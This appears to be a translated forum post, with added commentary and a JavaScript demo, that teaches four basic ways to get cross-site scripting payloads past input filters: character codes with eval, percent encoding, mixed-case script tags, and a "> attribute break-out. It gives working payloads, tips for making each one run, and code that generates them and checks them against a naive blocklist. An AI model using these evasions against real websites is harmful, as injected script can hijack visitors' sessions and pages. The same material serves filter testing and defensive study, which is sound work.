Four super-basic bypass methods.
1. Convert to ASCII character codes
Example: the original script is <script>alert('I love F4ck')</script>
After conversion it becomes:
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 39, 41))</script>
Caveat: String.fromCharCode only builds the string alert('I love F4ck'); it has to be handed to eval (or another JavaScript sink) to actually run, otherwise nothing happens. Watch the quote characters too: 8216 and 8217 are the curly quotes ‘ ’ that editors substitute for ', and they are not valid JavaScript string delimiters; the straight apostrophe is 39. This form hides the literal alert( and the quotes from a filter, but the <script> tag itself is unchanged.
2. Convert to HEX (hexadecimal, i.e. URL/percent encoding of every byte)
Example: the original script is <script>alert('I love F4ck')</script>
After conversion it becomes:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%49%20%6c%6f%76%65%20%46%34%63%6b%27%29%3c%2f%73%63%72%69%70%74%3e
Caveat: this is ordinary percent encoding, so it only gets past a filter that inspects the raw, undecoded parameter; the server has to URL-decode the value once before reflecting it into the page, otherwise the browser just sees the literal %3c... text. The quote is %27; sequences like %2018 or %2019 are not encodings of a quote (they decode to a space followed by "18"), so check the output of the encoder before sending it.
3. Change the case of the script tags
Example: the original script is <script>alert('I love F4ck')</script>
Becomes: <ScRipt>alert('I love F4ck')</sCRipT>
Caveat: only the HTML tag and attribute names may be mixed-case; the browser treats <ScRipt> and <script> as the same element, which is what defeats a case-sensitive match on "<script>". The JavaScript inside the tag is case-sensitive, so AleRt(...) is an undefined identifier and throws a ReferenceError instead of showing the alert box; leave the code itself unchanged.
4. Prepend a closing sequence ">
Example: the original script is <script>alert('I love F4ck')</script>
Becomes: "><script>alert('I love F4ck')</script>
Caveat: this is for input that is reflected inside a double-quoted attribute value, for example <input value="INPUT">. The " closes the attribute value and the > closes the tag, so the script element that follows is parsed as markup instead of attribute text. Look at the page source to see where the input actually lands first: a single-quoted attribute needs '> instead, and input reflected directly into the page body needs no prefix at all.
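As an added example (this is not code from the original post, nor from HackBar), the four transformations above applied to the same payload in JavaScript, checked against a constructed naive blocklist filter so it is visible which literal strings each form still contains. The blocklist, the reflection point <input type="text" value="..."> and the payload are assumptions made for the demonstration; the character-code form includes the eval step and uses 39 for the quotes, and the case change is restricted to tag names for the reasons given above.

```javascript
// Added example, not code from the original post: the four transformations the
// post lists, applied to one payload, plus a constructed naive blocklist filter
// so it is visible which literal strings each form still contains.

const PAYLOAD = "<script>alert('I love F4ck')</script>";
const JS_BODY = "alert('I love F4ck')";

// Constructed stand-in for a server-side blocklist that matches literal
// substrings before any decoding. Returns the patterns that fire, [] if none.
const BLOCKLIST = ["<script>", "alert("];
function blockedBy(input) {
  return BLOCKLIST.filter(p => input.includes(p));
}

// 1. Character-code form. String.fromCharCode only builds a string, so the
//    result is handed to eval; on its own it would display nothing. Quotes are
//    code 39 (straight apostrophe): 8216/8217 are the curly quotes and would
//    be a syntax error inside the script.
function toCharCodeScript(js) {
  const codes = Array.from(js, ch => ch.charCodeAt(0)).join(", ");
  return `<script>eval(String.fromCharCode(${codes}))</script>`;
}

// Reverses step 1 far enough to confirm the codes really spell the intended JS.
function decodeCharCodeScript(html) {
  const m = html.match(/String\.fromCharCode\(([^)]*)\)/);
  if (!m) throw new Error("no String.fromCharCode call found");
  return String.fromCharCode(...m[1].split(",").map(n => Number(n.trim())));
}

// 2. Percent ("hex") encoding of every UTF-8 byte, the kind of output the post
//    got from HackBar. It only slips past a filter that inspects the raw query
//    string; the server has to URL-decode the parameter before reflecting it.
function toPercentEncoding(s) {
  return Array.from(new TextEncoder().encode(s),
    b => "%" + b.toString(16).padStart(2, "0")).join("");
}

// 3. Mixed case, applied to tag names only. The HTML parser treats <ScRiPt> as
//    <script>, but JavaScript identifiers are case-sensitive: AleRt(...) would
//    throw ReferenceError instead of opening the alert box.
function mixCaseTagsOnly(html) {
  return html.replace(/<\/?[a-zA-Z]+/g, tag => {
    let i = 0;
    return tag.replace(/[a-zA-Z]/g, ch =>
      (i++ % 2 === 0) ? ch.toUpperCase() : ch.toLowerCase());
  });
}

// 4. Attribute break-out. Constructed reflection point: the input lands inside
//    a double-quoted value attribute. The leading "> closes the value and the
//    tag, so the script element after it is parsed as markup, not attribute text.
function reflectIntoAttribute(input) {
  return `<input type="text" value="${input}">`;
}
function withBreakout(payload) {
  return `">${payload}`;
}

// Builds every form once and reports what the naive filter would catch.
function demo() {
  const forms = {
    original: PAYLOAD,
    charcode: toCharCodeScript(JS_BODY),
    percent: toPercentEncoding(PAYLOAD),
    mixedCase: mixCaseTagsOnly(PAYLOAD),
    breakout: reflectIntoAttribute(withBreakout(PAYLOAD)),
  };
  for (const [name, value] of Object.entries(forms)) {
    console.log(name.padEnd(10), JSON.stringify(blockedBy(value)), value);
  }
  return forms;
}

demo();
```

Running it with node shows that the percent-encoded form matches nothing in the blocklist, the character-code form still trips the "<script>" rule, the mixed-case form still trips the "alert(" rule, and the "> prefix does not evade the filter at all: it is a context break-out, to be combined with one of the other three when a filter is also in the way.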
For more detailed bypass techniques see this page:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
The conversions were done with the HackBar Mozilla add-on for Firefox.